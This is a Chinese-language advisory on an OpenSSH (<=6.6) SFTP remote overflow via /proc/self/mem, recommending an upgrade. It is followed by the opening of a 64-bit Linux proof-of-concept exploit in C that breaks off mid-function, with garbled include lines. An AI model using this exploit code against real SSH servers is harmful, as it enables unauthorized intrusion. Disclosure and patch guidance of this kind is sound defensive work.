openssh升级sftp_OPENSSH SFTP 远程溢出漏洞

近日曝出OpenSSH SFTP 远程溢出漏洞。OpenSSH服务器中如果OpenSSH服务器中没有配置"ChrootDirectory"，普通用户就可以访问所有文件系统的资源，包括 /proc，在>=2.6.x的Linux内核上，/proc/self/maps会显示你的内存布局，/proc/self/mem可以让你任意在当前进程上下文中读写，而综合两者特性则可以造成远程溢出。

目前受影响的版本是<=OpenSSH 6.6，建议使用该系统的用户尽快升级到最新版本OpenSSH 6.7, OpenSSH 6.7包含了降低风险的方案：sftp-server使用prctl()来阻止直接访问/proc/self/{mem,maps}。Grsecurity/PaX直接禁止了/proc/pid/mem的可写，所以如果您的生产环境中部署了Grsecurity/PaX的话这个漏洞可以不用担心.

OpenSSH <=6.6 SFTP 远程溢出漏洞 PoC for 64bit Linux：#define _GNU_SOURCE

// THIS PROGRAM IS NOT DESIGNED TO BE SAFE AGAINST VICTIM MACHINES THAT

// TRY TO ATTACK BACK, THE CODE IS SLOPPY!

// (In other words, please don't use this against other people's machines.)

#include #include #include

#include

#include

#include

#include

#include

#include

#define min(a,b) (((a)

sftp_session sftp;

size_t grab_file(char *rpath, char **out) {

size_t allocated = 4000, used = 0;

*out = calloc(1, allocated+1);

sftp_file f = sftp_open(sftp, rpath, O_RDONLY, 0);

if (f == NULL) fprintf(stderr, "Error opening remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);

while (1) {

ssize_t nbytes = sftp_read(f, *out+used, allocated-used);

if (nbytes < 0) fprintf(stderr, "Error reading remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);

if (nbytes == 0) {

(*out)[used] = '